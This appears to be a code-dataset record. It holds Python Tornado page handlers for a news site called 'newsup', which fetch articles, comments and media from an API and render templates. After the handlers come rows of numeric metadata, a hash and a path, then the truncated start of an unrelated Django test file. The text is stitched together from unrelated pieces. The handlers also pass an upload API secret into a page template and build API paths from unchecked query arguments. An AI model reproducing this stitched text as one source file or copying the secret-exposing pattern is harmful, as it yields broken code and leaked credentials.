        activities = self._fetch_articles(dict(base, category="0bbf89e2f73411e69a3c00163e023e51", idx=0, limit=4), time_key=None)  # activities (raw timestamps)
        # Latest comments.
        lastest_comments = self._fetch_rs(API_DOMAIN + "/api/last-comments",
                                          {"filter": "league", "league_id": LEAGUE_ID, "idx": 0, "limit": 5})
        for comment in lastest_comments:
            comment['create_time'] = timestamp_friendly_date(comment['create_time'])
        self.render('newsup/author.html',
                    is_login=is_login,
                    league_info=league_info,
                    news=news,
                    populars=populars,
                    activities=activities,
                    api_domain=API_DOMAIN,
                    lastest_comments=lastest_comments)
class NewsupMediaHandler(BaseHandler):
    """Media page: multimedia gallery plus the usual article side sections.

    The repeated fetch/log/decode boilerplate of the original is factored into
    the private helpers below; behavior (URLs, request order, logging) is
    unchanged.
    """

    @staticmethod
    def _fetch_rs(url, params):
        """GET *url* with query *params* and return the decoded 'rs' payload.

        NOTE(review): the synchronous HTTPClient blocks tornado's IOLoop for
        the whole round trip — AsyncHTTPClient would be preferable here.
        """
        response = HTTPClient().fetch(url_concat(url, params), method="GET")
        logging.info("got response %r", response.body)
        return json_decode(response.body)['rs']

    @classmethod
    def _fetch_articles(cls, params, time_key='publish_time'):
        """Fetch an article list; humanize *time_key* unless it is None."""
        articles = cls._fetch_rs(API_DOMAIN + "/api/articles", params)
        if time_key:
            for article in articles:
                article[time_key] = timestamp_friendly_date(article[time_key])
        return articles

    def get(self):
        logging.info(self.request)
        # League info shown in the common page chrome.
        league_info = self.get_league_info()
        # Multimedia gallery (timestamps left raw, as in the original).
        multimedias = self._fetch_rs(API_DOMAIN + "/api/multimedias",
                                     {"filter": "league", "league_id": LEAGUE_ID, "idx": 0, "limit": 14})
        # Article sections, keyed by fixed category ids.
        base = {"filter": "league", "league_id": LEAGUE_ID, "status": "publish"}
        news = self._fetch_articles(dict(base, category="30a56cb8f73411e69a3c00163e023e51", idx=0, limit=6))      # news
        hots = self._fetch_articles(dict(base, category="1b86ad38f73411e69a3c00163e023e51", idx=0, limit=12))     # hot news
        populars = self._fetch_articles(dict(base, category="3801d62cf73411e69a3c00163e023e51", idx=0, limit=6))  # popular
        activities = self._fetch_articles(dict(base, category="0bbf89e2f73411e69a3c00163e023e51", idx=0, limit=4), time_key=None)  # activities (raw timestamps)
        # Latest comments.
        lastest_comments = self._fetch_rs(API_DOMAIN + "/api/last-comments",
                                          {"filter": "league", "league_id": LEAGUE_ID, "idx": 0, "limit": 5})
        for comment in lastest_comments:
            comment['create_time'] = timestamp_friendly_date(comment['create_time'])
        access_token = self.get_secure_cookie("access_token")
        is_login = bool(access_token)
        self.render('newsup/media.html',
                    is_login=is_login,
                    league_info=league_info,
                    news=news,
                    populars=populars,
                    activities=activities,
                    hots=hots,
                    lastest_comments=lastest_comments,
                    league_id=LEAGUE_ID,
                    api_domain=API_DOMAIN,
                    multimedias=multimedias)
class NewsupShortcodesHandler(BaseHandler):
    """Shortcodes demo page: news, popular and activity article lists.

    The repeated fetch/log/decode boilerplate of the original is factored into
    the private helpers below; behavior (URLs, request order, logging) is
    unchanged.
    """

    @staticmethod
    def _fetch_rs(url, params):
        """GET *url* with query *params* and return the decoded 'rs' payload.

        NOTE(review): the synchronous HTTPClient blocks tornado's IOLoop for
        the whole round trip — AsyncHTTPClient would be preferable here.
        """
        response = HTTPClient().fetch(url_concat(url, params), method="GET")
        logging.info("got response %r", response.body)
        return json_decode(response.body)['rs']

    @classmethod
    def _fetch_articles(cls, params, time_key='publish_time'):
        """Fetch an article list; humanize *time_key* unless it is None."""
        articles = cls._fetch_rs(API_DOMAIN + "/api/articles", params)
        if time_key:
            for article in articles:
                article[time_key] = timestamp_friendly_date(article[time_key])
        return articles

    def get(self):
        logging.info(self.request)
        # League info shown in the common page chrome.
        league_info = self.get_league_info()
        # Article sections, keyed by fixed category ids.
        base = {"filter": "league", "league_id": LEAGUE_ID, "status": "publish"}
        news = self._fetch_articles(dict(base, category="30a56cb8f73411e69a3c00163e023e51", idx=0, limit=6))      # news
        populars = self._fetch_articles(dict(base, category="3801d62cf73411e69a3c00163e023e51", idx=0, limit=6))  # popular
        activities = self._fetch_articles(dict(base, category="0bbf89e2f73411e69a3c00163e023e51", idx=0, limit=4), time_key=None)  # activities (raw timestamps)
        access_token = self.get_secure_cookie("access_token")
        is_login = bool(access_token)
        self.render('newsup/shortcodes.html',
                    is_login=is_login,
                    league_info=league_info,
                    news=news,
                    activities=activities,
                    api_domain=API_DOMAIN,
                    populars=populars)
class NewsupContactHandler(BaseHandler):
    """Contact page: league info plus the five most recent comments."""

    def get(self):
        logging.info(self.request)
        # League info shown in the common page chrome.
        league_info = self.get_league_info()
        # Latest comments across the league, with human-friendly timestamps.
        query = {"filter": "league", "league_id": LEAGUE_ID, "idx": 0, "limit": 5}
        response = HTTPClient().fetch(
            url_concat(API_DOMAIN + "/api/last-comments", query), method="GET")
        logging.info("got response %r", response.body)
        lastest_comments = json_decode(response.body)['rs']
        for comment in lastest_comments:
            comment['create_time'] = timestamp_friendly_date(comment['create_time'])
        access_token = self.get_secure_cookie("access_token")
        is_login = bool(access_token)
        self.render('newsup/contact.html',
                    is_login=is_login,
                    league_info=league_info,
                    lastest_comments=lastest_comments,
                    api_domain=API_DOMAIN,
                    league_id=LEAGUE_ID)
class NewsupItemDetailHandler(BaseHandler):
    """Render the article ("item") detail page of the newsup theme."""

    # Well-known category ids referenced by the newsup templates.
    _CATEGORY_POPULAR = "3801d62cf73411e69a3c00163e023e51"
    _CATEGORY_ACTIVITY = "0bbf89e2f73411e69a3c00163e023e51"
    _CATEGORY_HOT = "1b86ad38f73411e69a3c00163e023e51"

    def _api_get(self, path, params=None):
        """Synchronously GET ``API_DOMAIN + path`` (optionally with query
        *params*) and return the decoded ``'rs'`` payload of the JSON body."""
        url = API_DOMAIN + path
        if params:
            url = url_concat(url, params)
        response = HTTPClient().fetch(url, method="GET")
        logging.info("got response %r", response.body)
        return json_decode(response.body)['rs']

    def _friendly_times(self, items, field):
        """Rewrite ``item[field]`` of every item as a friendly date string,
        in place, and return *items* for chaining."""
        for item in items:
            item[field] = timestamp_friendly_date(item[field])
        return items

    def get(self):
        """Assemble the sidebar/section feeds plus the article itself, bump
        the article read counter, and render the detail template.

        Query argument: ``id`` -- the article id (empty string if missing).
        """
        logging.info(self.request)
        article_id = self.get_argument("id", "")
        # league(联盟信息)
        league_info = self.get_league_info()
        # recently published articles
        news = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish", "idx": 0, "limit": 6}),
            'publish_time')
        # popular articles
        populars = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_POPULAR,
                           "idx": 0, "limit": 4}),
            'publish_time')
        # activity articles (timestamps intentionally left unconverted,
        # matching the original behavior)
        activities = self._api_get("/api/articles",
                                   {"filter": "league", "league_id": LEAGUE_ID,
                                    "status": "publish",
                                    "category": self._CATEGORY_ACTIVITY,
                                    "idx": 0, "limit": 4})
        # the article itself
        article_info = self._api_get("/api/articles/" + article_id)
        article_info['publish_time'] = timestamp_friendly_date(
            article_info['publish_time'])
        # hot news
        hots = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_HOT,
                           "idx": 0, "limit": 12}),
            'publish_time')
        # Bump the read counter. NOTE(review): this read-modify-write is not
        # atomic, so concurrent readers can lose increments -- a server-side
        # increment endpoint would be safer.
        _json = json_encode({"read_num": article_info['read_num'] + 1})
        response = HTTPClient().fetch(
            API_DOMAIN + "/api/articles/" + article_id + "/read",
            method="POST", body=_json)
        logging.info("got update read_num response %r", response.body)
        # latest comments
        lastest_comments = self._friendly_times(
            self._api_get("/api/last-comments",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "idx": 0, "limit": 5}),
            'create_time')
        # multimedia
        multimedias = self._api_get("/api/multimedias",
                                    {"filter": "league", "league_id": LEAGUE_ID,
                                     "idx": 0, "limit": 4})
        access_token = self.get_secure_cookie("access_token")
        self.render('newsup/item-detail.html',
                    is_login=bool(access_token),
                    access_token=access_token,
                    league_info=league_info,
                    article_info=article_info,
                    news=news,
                    populars=populars,
                    hots=hots,
                    activities=activities,
                    api_domain=API_DOMAIN,
                    multimedias=multimedias,
                    lastest_comments=lastest_comments)
class NewsupNewHandler(BaseHandler):
    """Render the "new article" page of the newsup theme."""

    def get(self):
        """Show the page with league info and the current login state."""
        logging.info(self.request)
        # league info (联盟信息) for the page header
        league_info = self.get_league_info()
        # the secure cookie doubles as the login indicator
        token = self.get_secure_cookie("access_token")
        self.render('newsup/new.html',
                    league_info=league_info,
                    api_domain=API_DOMAIN,
                    is_login=bool(token))
class NewsupCategoryTileHandler(BaseHandler):
    """Render the category "tile" overview page of the newsup theme."""

    # Well-known category ids referenced by the newsup templates.
    _CATEGORY_POPULAR = "3801d62cf73411e69a3c00163e023e51"
    _CATEGORY_ACTIVITY = "0bbf89e2f73411e69a3c00163e023e51"

    def _api_get(self, path, params=None):
        """Synchronously GET ``API_DOMAIN + path`` (optionally with query
        *params*) and return the decoded ``'rs'`` payload of the JSON body."""
        url = API_DOMAIN + path
        if params:
            url = url_concat(url, params)
        response = HTTPClient().fetch(url, method="GET")
        logging.info("got response %r", response.body)
        return json_decode(response.body)['rs']

    def _friendly_times(self, items, field):
        """Rewrite ``item[field]`` of every item as a friendly date string,
        in place, and return *items* for chaining."""
        for item in items:
            item[field] = timestamp_friendly_date(item[field])
        return items

    def get(self):
        """Collect the news/popular/activity feeds plus the latest comments
        and render the category-tile template."""
        logging.info(self.request)
        # league(联盟信息)
        league_info = self.get_league_info()
        # recently published articles
        news = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish", "idx": 0, "limit": 6}),
            'publish_time')
        # popular articles
        populars = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_POPULAR,
                           "idx": 0, "limit": 6}),
            'publish_time')
        # activity articles (timestamps intentionally left unconverted,
        # matching the original behavior)
        activities = self._api_get("/api/articles",
                                   {"filter": "league", "league_id": LEAGUE_ID,
                                    "status": "publish",
                                    "category": self._CATEGORY_ACTIVITY,
                                    "idx": 0, "limit": 4})
        # latest comments
        lastest_comments = self._friendly_times(
            self._api_get("/api/last-comments",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "idx": 0, "limit": 5}),
            'create_time')
        access_token = self.get_secure_cookie("access_token")
        self.render('newsup/category-tile.html',
                    is_login=bool(access_token),
                    league_info=league_info,
                    lastest_comments=lastest_comments,
                    news=news,
                    activities=activities,
                    api_domain=API_DOMAIN,
                    populars=populars)
class NewsupCategoryHandler(BaseHandler):
    """Render a single category page: the category's own articles plus the
    shared feeds (news, popular, activity, hot, comments, multimedia)."""

    # Well-known category ids referenced by the newsup templates.
    _CATEGORY_POPULAR = "3801d62cf73411e69a3c00163e023e51"
    _CATEGORY_ACTIVITY = "0bbf89e2f73411e69a3c00163e023e51"
    _CATEGORY_HOT = "1b86ad38f73411e69a3c00163e023e51"

    def _api_get(self, path, params=None):
        """Synchronously GET ``API_DOMAIN + path`` (optionally with query
        *params*) and return the decoded ``'rs'`` payload of the JSON body."""
        url = API_DOMAIN + path
        if params:
            url = url_concat(url, params)
        response = HTTPClient().fetch(url, method="GET")
        logging.info("got response %r", response.body)
        return json_decode(response.body)['rs']

    def _friendly_times(self, items, field):
        """Rewrite ``item[field]`` of every item as a friendly date string,
        in place, and return *items* for chaining."""
        for item in items:
            item[field] = timestamp_friendly_date(item[field])
        return items

    def get(self):
        """Render the category template for the ``id`` query argument."""
        logging.info(self.request)
        category_id = self.get_argument("id", "")
        # league(联盟信息)
        league_info = self.get_league_info()
        # the category record itself (for its display name)
        category = self._api_get("/api/categories/" + category_id)
        # articles belonging to this category
        sceneries = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish", "category": category_id,
                           "idx": 0, "limit": 6}),
            'publish_time')
        # multimedia
        multimedias = self._api_get("/api/multimedias",
                                    {"filter": "league", "league_id": LEAGUE_ID,
                                     "idx": 0, "limit": 4})
        # recently published articles
        news = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish", "idx": 0, "limit": 6}),
            'publish_time')
        # popular articles
        populars = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_POPULAR,
                           "idx": 0, "limit": 6}),
            'publish_time')
        # activity articles (timestamps intentionally left unconverted,
        # matching the original behavior)
        activities = self._api_get("/api/articles",
                                   {"filter": "league", "league_id": LEAGUE_ID,
                                    "status": "publish",
                                    "category": self._CATEGORY_ACTIVITY,
                                    "idx": 0, "limit": 4})
        # hot news
        hots = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_HOT,
                           "idx": 0, "limit": 12}),
            'publish_time')
        # latest comments
        lastest_comments = self._friendly_times(
            self._api_get("/api/last-comments",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "idx": 0, "limit": 5}),
            'create_time')
        access_token = self.get_secure_cookie("access_token")
        self.render('newsup/category.html',
                    is_login=bool(access_token),
                    league_info=league_info,
                    sceneries=sceneries,
                    news=news,
                    hots=hots,
                    populars=populars,
                    activities=activities,
                    lastest_comments=lastest_comments,
                    multimedias=multimedias,
                    league_id=LEAGUE_ID,
                    category_id=category_id,
                    api_domain=API_DOMAIN,
                    category=category)
class NewsupCategorySearchHandler(BaseHandler):
    """Render the category search page; identical data set to the category
    page but rendered with the category-search template."""

    # Well-known category ids referenced by the newsup templates.
    _CATEGORY_POPULAR = "3801d62cf73411e69a3c00163e023e51"
    _CATEGORY_ACTIVITY = "0bbf89e2f73411e69a3c00163e023e51"
    _CATEGORY_HOT = "1b86ad38f73411e69a3c00163e023e51"

    def _api_get(self, path, params=None):
        """Synchronously GET ``API_DOMAIN + path`` (optionally with query
        *params*) and return the decoded ``'rs'`` payload of the JSON body."""
        url = API_DOMAIN + path
        if params:
            url = url_concat(url, params)
        response = HTTPClient().fetch(url, method="GET")
        logging.info("got response %r", response.body)
        return json_decode(response.body)['rs']

    def _friendly_times(self, items, field):
        """Rewrite ``item[field]`` of every item as a friendly date string,
        in place, and return *items* for chaining."""
        for item in items:
            item[field] = timestamp_friendly_date(item[field])
        return items

    def get(self):
        """Render the category-search template for the ``id`` argument."""
        logging.info(self.request)
        category_id = self.get_argument("id", "")
        # league(联盟信息)
        league_info = self.get_league_info()
        # the category record itself (for its display name)
        category = self._api_get("/api/categories/" + category_id)
        # articles belonging to this category
        sceneries = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish", "category": category_id,
                           "idx": 0, "limit": 6}),
            'publish_time')
        # multimedia
        multimedias = self._api_get("/api/multimedias",
                                    {"filter": "league", "league_id": LEAGUE_ID,
                                     "idx": 0, "limit": 4})
        # recently published articles
        news = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish", "idx": 0, "limit": 6}),
            'publish_time')
        # popular articles
        populars = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_POPULAR,
                           "idx": 0, "limit": 6}),
            'publish_time')
        # activity articles (timestamps intentionally left unconverted,
        # matching the original behavior)
        activities = self._api_get("/api/articles",
                                   {"filter": "league", "league_id": LEAGUE_ID,
                                    "status": "publish",
                                    "category": self._CATEGORY_ACTIVITY,
                                    "idx": 0, "limit": 4})
        # hot news
        hots = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_HOT,
                           "idx": 0, "limit": 12}),
            'publish_time')
        # latest comments
        lastest_comments = self._friendly_times(
            self._api_get("/api/last-comments",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "idx": 0, "limit": 5}),
            'create_time')
        access_token = self.get_secure_cookie("access_token")
        self.render('newsup/category-search.html',
                    is_login=bool(access_token),
                    league_info=league_info,
                    sceneries=sceneries,
                    news=news,
                    hots=hots,
                    populars=populars,
                    activities=activities,
                    lastest_comments=lastest_comments,
                    multimedias=multimedias,
                    league_id=LEAGUE_ID,
                    category_id=category_id,
                    api_domain=API_DOMAIN,
                    category=category)
class NewsupFranchisesHandler(BaseHandler):
    """Render the franchises (clubs, 景区) listing page for one type."""

    # Well-known category ids referenced by the newsup templates.
    _CATEGORY_POPULAR = "3801d62cf73411e69a3c00163e023e51"
    _CATEGORY_ACTIVITY = "0bbf89e2f73411e69a3c00163e023e51"
    _CATEGORY_HOT = "1b86ad38f73411e69a3c00163e023e51"

    def _api_get(self, path, params=None):
        """Synchronously GET ``API_DOMAIN + path`` (optionally with query
        *params*) and return the decoded ``'rs'`` payload of the JSON body."""
        url = API_DOMAIN + path
        if params:
            url = url_concat(url, params)
        response = HTTPClient().fetch(url, method="GET")
        logging.info("got response %r", response.body)
        return json_decode(response.body)['rs']

    def _friendly_times(self, items, field):
        """Rewrite ``item[field]`` of every item as a friendly date string,
        in place, and return *items* for chaining."""
        for item in items:
            item[field] = timestamp_friendly_date(item[field])
        return items

    def get(self):
        """Render the franchises page for the ``franchise_type`` argument."""
        logging.info(self.request)
        franchise_type = self.get_argument("franchise_type", "")
        # encode to a byte string for the downstream request (Python 2 str)
        franchise_type = franchise_type.encode('utf-8')
        logging.info("got franchise_type %r from argument", franchise_type)
        # league(联盟信息)
        league_info = self.get_league_info()
        # franchises(景区): a paged club list -- 'rs' wraps the page in 'data'
        franchises = self._api_get("/api/leagues/" + LEAGUE_ID + "/clubs",
                                   {"franchise_type": franchise_type,
                                    "page": 1, "limit": 1})['data']
        self._friendly_times(franchises, 'create_time')
        # multimedia
        multimedias = self._api_get("/api/multimedias",
                                    {"filter": "league", "league_id": LEAGUE_ID,
                                     "idx": 0, "limit": 4})
        # recently published articles
        news = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish", "idx": 0, "limit": 6}),
            'publish_time')
        # popular articles
        populars = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_POPULAR,
                           "idx": 0, "limit": 6}),
            'publish_time')
        # activity articles (timestamps intentionally left unconverted,
        # matching the original behavior)
        activities = self._api_get("/api/articles",
                                   {"filter": "league", "league_id": LEAGUE_ID,
                                    "status": "publish",
                                    "category": self._CATEGORY_ACTIVITY,
                                    "idx": 0, "limit": 4})
        # hot news
        hots = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_HOT,
                           "idx": 0, "limit": 12}),
            'publish_time')
        # latest comments
        lastest_comments = self._friendly_times(
            self._api_get("/api/last-comments",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "idx": 0, "limit": 5}),
            'create_time')
        access_token = self.get_secure_cookie("access_token")
        self.render('newsup/franchises.html',
                    is_login=bool(access_token),
                    league_info=league_info,
                    franchises=franchises,
                    multimedias=multimedias,
                    news=news,
                    hots=hots,
                    populars=populars,
                    activities=activities,
                    lastest_comments=lastest_comments,
                    league_id=LEAGUE_ID,
                    api_domain=API_DOMAIN,
                    franchise_type=franchise_type)
class NewsupFranchiseDetailHandler(BaseHandler):
    """Render one franchise (club) detail page."""

    # Well-known category ids referenced by the newsup templates.
    _CATEGORY_POPULAR = "3801d62cf73411e69a3c00163e023e51"
    _CATEGORY_ACTIVITY = "0bbf89e2f73411e69a3c00163e023e51"
    _CATEGORY_HOT = "1b86ad38f73411e69a3c00163e023e51"

    def _api_get(self, path, params=None):
        """Synchronously GET ``API_DOMAIN + path`` (optionally with query
        *params*) and return the decoded ``'rs'`` payload of the JSON body."""
        url = API_DOMAIN + path
        if params:
            url = url_concat(url, params)
        response = HTTPClient().fetch(url, method="GET")
        logging.info("got response %r", response.body)
        return json_decode(response.body)['rs']

    def _friendly_times(self, items, field):
        """Rewrite ``item[field]`` of every item as a friendly date string,
        in place, and return *items* for chaining."""
        for item in items:
            item[field] = timestamp_friendly_date(item[field])
        return items

    def get(self):
        """Fetch the club for the ``id`` argument, backfill optional fields,
        bump its read counter, and render the franchise-detail template."""
        logging.info(self.request)
        franchise_id = self.get_argument("id", "")
        # league(联盟信息)
        league_info = self.get_league_info()
        # recently published articles
        news = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish", "idx": 0, "limit": 4}),
            'publish_time')
        # popular articles
        populars = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_POPULAR,
                           "idx": 0, "limit": 4}),
            'publish_time')
        # activity articles (timestamps intentionally left unconverted,
        # matching the original behavior)
        activities = self._api_get("/api/articles",
                                   {"filter": "league", "league_id": LEAGUE_ID,
                                    "status": "publish",
                                    "category": self._CATEGORY_ACTIVITY,
                                    "idx": 0, "limit": 4})
        # the franchise (club) itself
        franchise = self._api_get("/api/clubs/" + franchise_id)
        # Backfill optional fields. ('in' replaces the Python-2-only
        # dict.has_key(), with identical semantics.)
        if 'paragraphs' not in franchise:
            franchise['paragraphs'] = ''
        if 'franchise_type' not in franchise:
            franchise['franchise_type'] = 'franchise'
        if 'create_time' in franchise:
            franchise['create_time'] = timestamp_friendly_date(
                franchise['create_time'])
        else:
            franchise['create_time'] = timestamp_friendly_date(0)
        # hot news
        hots = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_HOT,
                           "idx": 0, "limit": 12}),
            'publish_time')
        # Bump the read counter. NOTE(review): this POSTs a *club* id to the
        # /api/articles/<id>/read endpoint, mirroring the original code --
        # confirm against the API whether /api/clubs/<id>/read was intended.
        _json = json_encode({"read_num": franchise['read_num'] + 1})
        response = HTTPClient().fetch(
            API_DOMAIN + "/api/articles/" + franchise_id + "/read",
            method="POST", body=_json)
        logging.info("got update read_num response %r", response.body)
        # latest comments
        lastest_comments = self._friendly_times(
            self._api_get("/api/last-comments",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "idx": 0, "limit": 5}),
            'create_time')
        # multimedia
        multimedias = self._api_get("/api/multimedias",
                                    {"filter": "league", "league_id": LEAGUE_ID,
                                     "idx": 0, "limit": 4})
        access_token = self.get_secure_cookie("access_token")
        self.render('newsup/franchise-detail.html',
                    is_login=bool(access_token),
                    access_token=access_token,
                    league_info=league_info,
                    franchise=franchise,
                    news=news,
                    populars=populars,
                    hots=hots,
                    activities=activities,
                    multimedias=multimedias,
                    api_domain=API_DOMAIN,
                    lastest_comments=lastest_comments)
class NewsupApplyFranchiseHandler(AuthorizationHandler):
    """Render the franchise application page for a logged-in user."""

    @tornado.web.authenticated  # if no session, redirect to login page
    def get(self):
        """Fetch the caller's existing franchise application (best-effort)
        plus the latest comments, then render the apply-franchise form."""
        logging.info(self.request)
        # league(联盟信息)
        league_info = self.get_league_info()
        access_token = self.get_secure_cookie("access_token")
        is_login = bool(access_token)
        franchise = None
        try:
            params = {"filter": "franchise"}
            url = url_concat(API_DOMAIN + "/api/myinfo", params)
            headers = {"Authorization": "Bearer " + access_token}
            response = HTTPClient().fetch(url, method="GET", headers=headers)
            logging.info("got response %r", response.body)
            franchise = json_decode(response.body)['rs']
            if franchise:
                club = franchise['club']
                # Backfill optional club fields. ('in' replaces the
                # Python-2-only dict.has_key(), with identical semantics.)
                if 'province' not in club:
                    club['province'] = ''
                    club['city'] = ''
                if 'city' not in club:
                    club['city'] = ''
                if 'franchise_type' not in club:
                    club['franchise_type'] = ''
                franchise['create_time'] = timestamp_datetime(
                    franchise['create_time'])
        except Exception:
            # Narrowed from a bare 'except:' so SystemExit/KeyboardInterrupt
            # still propagate; the lookup stays best-effort by design.
            logging.info("got franchise=[None]")
        # latest comments(最新的评论)
        params = {"filter": "league", "league_id": LEAGUE_ID, "idx": 0, "limit": 5}
        url = url_concat(API_DOMAIN + "/api/last-comments", params)
        response = HTTPClient().fetch(url, method="GET")
        logging.info("got response %r", response.body)
        lastest_comments = json_decode(response.body)['rs']
        for comment in lastest_comments:
            comment['create_time'] = timestamp_friendly_date(comment['create_time'])
        self.render('newsup/apply-franchise.html',
                    is_login=is_login,
                    league_info=league_info,
                    access_token=access_token,
                    league_id=LEAGUE_ID,
                    franchise=franchise,
                    api_domain=API_DOMAIN,
                    upyun_domain=UPYUN_DOMAIN,
                    upyun_notify_url=UPYUN_NOTIFY_URL,
                    upyun_form_api_secret=UPYUN_FORM_API_SECRET,
                    upyun_bucket=UPYUN_BUCKET,
                    lastest_comments=lastest_comments)
class NewsupSearchResultHandler(BaseHandler):
    """Render the search-result page with the shared newsup feeds."""

    # Well-known category ids referenced by the newsup templates.
    _CATEGORY_NEWS = "0e9a3c68e94511e6b40600163e023e51"
    _CATEGORY_POPULAR = "3801d62cf73411e69a3c00163e023e51"
    _CATEGORY_ACTIVITY = "0bbf89e2f73411e69a3c00163e023e51"

    def _api_get(self, path, params=None):
        """Synchronously GET ``API_DOMAIN + path`` (optionally with query
        *params*) and return the decoded ``'rs'`` payload of the JSON body."""
        url = API_DOMAIN + path
        if params:
            url = url_concat(url, params)
        response = HTTPClient().fetch(url, method="GET")
        logging.info("got response %r", response.body)
        return json_decode(response.body)['rs']

    def _friendly_times(self, items, field):
        """Rewrite ``item[field]`` of every item as a friendly date string,
        in place, and return *items* for chaining."""
        for item in items:
            item[field] = timestamp_friendly_date(item[field])
        return items

    def get(self):
        """Collect multimedia, news, popular, activity and comment feeds,
        then render the search-result template."""
        logging.info(self.request)
        # league(联盟信息)
        league_info = self.get_league_info()
        # multimedia
        multimedias = self._api_get("/api/multimedias",
                                    {"filter": "league", "league_id": LEAGUE_ID,
                                     "idx": 0, "limit": 4})
        # news(新闻)
        news = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_NEWS,
                           "idx": 0, "limit": 6}),
            'publish_time')
        # popular articles
        populars = self._friendly_times(
            self._api_get("/api/articles",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "status": "publish",
                           "category": self._CATEGORY_POPULAR,
                           "idx": 0, "limit": 6}),
            'publish_time')
        # activity articles (timestamps intentionally left unconverted,
        # matching the original behavior)
        activities = self._api_get("/api/articles",
                                   {"filter": "league", "league_id": LEAGUE_ID,
                                    "status": "publish",
                                    "category": self._CATEGORY_ACTIVITY,
                                    "idx": 0, "limit": 4})
        # latest comments
        lastest_comments = self._friendly_times(
            self._api_get("/api/last-comments",
                          {"filter": "league", "league_id": LEAGUE_ID,
                           "idx": 0, "limit": 5}),
            'create_time')
        access_token = self.get_secure_cookie("access_token")
        self.render('newsup/search-result.html',
                    is_login=bool(access_token),
                    league_info=league_info,
                    news=news,
                    populars=populars,
                    activities=activities,
                    lastest_comments=lastest_comments,
                    multimedias=multimedias,
                    league_id=LEAGUE_ID,
                    api_domain=API_DOMAIN)
| 42.344051
| 147
| 0.617264
| 5,878
| 52,676
| 5.330384
| 0.045594
| 0.049151
| 0.035236
| 0.056524
| 0.911943
| 0.896751
| 0.885484
| 0.881782
| 0.872558
| 0.855962
| 0
| 0.024716
| 0.253436
| 52,676
| 1,243
| 148
| 42.378117
| 0.772008
| 0.051162
| 0
| 0.873837
| 0
| 0
| 0.177136
| 0.026935
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01758
| false
| 0
| 0.015512
| 0
| 0.051706
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fd68838a198e555cedc8ddbc815c1bf6e3f505a
| 14,526
|
py
|
Python
|
communication/tests.py
|
BridgesLab/Lab-Website
|
d6f6c9c068bbf668c253e5943d9514947023e66d
|
[
"CC0-1.0",
"MIT"
] | 6
|
2015-08-31T16:55:16.000Z
|
2022-02-10T08:23:07.000Z
|
communication/tests.py
|
BridgesLab/Lab-Website
|
d6f6c9c068bbf668c253e5943d9514947023e66d
|
[
"CC0-1.0",
"MIT"
] | 30
|
2015-03-22T15:49:31.000Z
|
2020-05-25T23:59:37.000Z
|
communication/tests.py
|
BridgesLab/Lab-Website
|
d6f6c9c068bbf668c253e5943d9514947023e66d
|
[
"CC0-1.0",
"MIT"
] | 6
|
2016-09-07T08:25:21.000Z
|
2020-03-27T10:24:57.000Z
|
"""
This file contains the unit tests for the :mod:`communication` app.
There are both model and view tests:
* :class:`~communication.tests.CommunicationModelTests`
* :class:`~communication.tests.CommunicationViewTests`
"""
from lab_website.tests import BasicTests
from communication.models import LabAddress,LabLocation,Post
from personnel.models import Address, Person
from papers.models import Publication
from projects.models import Project
class CommunicationModelTests(BasicTests):
    '''Tests for the models in the :mod:`communication` app.'''

    fixtures = ['test_address', ]

    def test_create_new_lab_address(self):
        '''A :class:`~communication.models.LabAddress` saves with only the
        required fields set.'''
